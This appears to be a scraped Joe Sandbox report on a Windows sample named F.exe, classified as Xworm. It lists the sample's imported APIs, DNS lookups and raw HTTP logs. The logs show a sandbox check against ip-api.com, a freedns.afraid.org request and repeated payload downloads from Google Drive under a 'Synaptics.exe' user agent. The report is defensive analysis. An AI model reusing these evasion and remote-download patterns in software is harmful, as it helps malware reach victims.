user32.dll	GetKeyboardType, MessageBoxA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegSetValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	WriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
gdi32.dll	StretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
user32.dll	ReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
shell32.dll	ShellExecuteA, ExtractIconA

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 06:51:19.576951981 CEST	53214	53	192.168.2.5	1.1.1.1
Jul 2, 2024 06:51:19.585954905 CEST	53	53214	1.1.1.1	192.168.2.5
Jul 2, 2024 06:51:21.581386089 CEST	59967	53	192.168.2.5	1.1.1.1
Jul 2, 2024 06:51:21.588057995 CEST	53	59967	1.1.1.1	192.168.2.5
Jul 2, 2024 06:51:22.310076952 CEST	54047	53	192.168.2.5	1.1.1.1
Jul 2, 2024 06:51:22.317898989 CEST	53	54047	1.1.1.1	192.168.2.5
Jul 2, 2024 06:51:22.354827881 CEST	61260	53	192.168.2.5	1.1.1.1
Jul 2, 2024 06:51:22.362205982 CEST	53	61260	1.1.1.1	192.168.2.5
Jul 2, 2024 06:51:22.838444948 CEST	57133	53	192.168.2.5	1.1.1.1
Jul 2, 2024 06:51:22.845913887 CEST	53	57133	1.1.1.1	192.168.2.5
Jul 2, 2024 06:51:28.985130072 CEST	58052	53	192.168.2.5	1.1.1.1
Jul 2, 2024 06:51:29.100892067 CEST	53	58052	1.1.1.1	192.168.2.5
Jul 2, 2024 06:51:35.956388950 CEST	59673	53	192.168.2.5	1.1.1.1
Jul 2, 2024 06:51:36.091516972 CEST	53	59673	1.1.1.1	192.168.2.5
Jul 2, 2024 06:51:42.878271103 CEST	60772	53	192.168.2.5	1.1.1.1
Jul 2, 2024 06:51:42.887943983 CEST	53	60772	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 06:51:19.604758978 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jul 2, 2024 06:51:20.095616102 CEST	175	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 04:51:19 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 58 X-Rl: 43 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 06:51:22.387763977 CEST	154	OUT	GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 User-Agent: MyApp Host: freedns.afraid.org Cache-Control: no-cache
Jul 2, 2024 06:51:23.013956070 CEST	243	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 02 Jul 2024 04:51:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Cache: MISS Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fERROR: Could not authenticate.0

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:22 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-07-02 04:51:22 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:22 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-K2zHtUlmwVVuV8kyaT4NrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:23 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-07-02 04:51:23 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:23 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-Cg_VHboP8zgaLnXLg-4FGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:23 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-07-02 04:51:23 UTC	1585	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:23 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'report-sample' 'nonce-0QV0jR1sln1Fj9GcaoYkkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1642 X-GUploader-UploadID: ACJd0NqEruspLaOOJrRSdie2_aGIN3xoT1qKJPCv28Ewi5NyH5stL_p5JWbOIcSn2tbgeHGVOMM Server: UploadServer Set-Cookie: NID=515=hvNqLQGGTW_jz-Z-2Gifs1ZmMOcy9V7YwuCTkJ9UsaPlvIDjrgJvd-weTfYLZ6plN_u27mHeGvvWsNasfuhssEgcVrwaGUfDL1rg6SbcVNO2Nw5L9UyXxHRiiCXTd3QV4aREWJhGdvGnJQwd-rryP0B_x1r3oXK265LQum1pmfM; expires=Wed, 01-Jan-2025 04:51:23 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-07-02 04:51:23 UTC	1585	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 7a 37 65 47 79 42 61 48 71 79 4f 6e 51 30 51 5f 69 36 4a 59 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 Data Ascii: <html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_z7eGyBaHqyOnQ0Q_i6JYw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-seri
2024-07-02 04:51:23 UTC	57	IN	Data Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: d on this server. <ins>Thats all we know.</ins></main>

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:23 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-07-02 04:51:24 UTC	1585	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:23 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'report-sample' 'nonce-h6h2GTXVoNqcKn8WTpvzTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1642 X-GUploader-UploadID: ACJd0NqU4FYcxiiXDjGMJzLQJaDvq7BpoOuNldwUMM6frWlpQrbTz676Tb4JJwdF83wtqWaRJ5Y Server: UploadServer Set-Cookie: NID=515=IbPQbmkO8S1c__kDzWy2niX9im8MAVnJ0ifr197baqmYgMBHx1Gdq7YI3NNXycd3ge8Qf-Mkbwlt27bx5bRdhUEvWlqwVraURIaL3FIv8h2ePtmkvqEjd_HFpPJYvCrj-dzSXhJdnl_4WxISiCzdyaSwhb0j4OcPgFDXebu_nlw; expires=Wed, 01-Jan-2025 04:51:23 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-07-02 04:51:24 UTC	1585	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 49 46 42 55 77 77 6e 4d 65 54 68 4b 2d 72 52 44 35 4a 6f 30 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 Data Ascii: <html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7IFBUwwnMeThK-rRD5Jo0g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-seri
2024-07-02 04:51:24 UTC	57	IN	Data Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: d on this server. <ins>Thats all we know.</ins></main>

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:24 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-07-02 04:51:25 UTC	1585	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:24 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-JGh5ZFeigZoyePwda9d-Sg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1642 X-GUploader-UploadID: ACJd0NoLCQuFTHxzixSymh4FWFC4x7z1FNMxw8JsUy91o2gN6O-whJC79yHNdGRSUWuH6s1E32w Server: UploadServer Set-Cookie: NID=515=A3_DWj-uYlS8SG5SSf4h2bgber-DsAFUfVFi3FxDtVi6jdEuIU6gVf6qK91beLGBvOf1aDV0Nep13pF86ny2gczGzT-3nbHCtLKC8cn0g8_K7gZDcqKMbM307ceTmcEP8JCdf4BXdMiJYzViINyBdRPd8CGRJRG-5NAuxhs9Z5M; expires=Wed, 01-Jan-2025 04:51:24 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-07-02 04:51:25 UTC	1585	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 50 57 71 56 72 55 5a 58 48 64 34 4f 4c 59 74 76 38 7a 42 43 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 Data Ascii: <html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1PWqVrUZXHd4OLYtv8zBCg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-seri
2024-07-02 04:51:25 UTC	57	IN	Data Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: d on this server. <ins>Thats all we know.</ins></main>

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:25 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-07-02 04:51:26 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:25 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-t416PsK4htAa5gXulobJaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:27 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-07-02 04:51:27 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:27 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-RJTzfzk52x-Yz95l4fRNiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report F.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Au3Check.exe

C:\Program Files (x86)\AutoIt3\Au3Info.exe

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

Windows Analysis Report
F.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:28 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-07-02 04:51:28 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:28 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-SShM9zi6z-b_nNkpZxb4cQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:29 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-07-02 04:51:29 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:29 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-B2d2aUtimdMVFatFcScBqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-02 04:51:31 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-07-02 04:51:32 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 02 Jul 2024 04:51:32 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-9UgHLQh-D-JT8oSCFfHutg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, 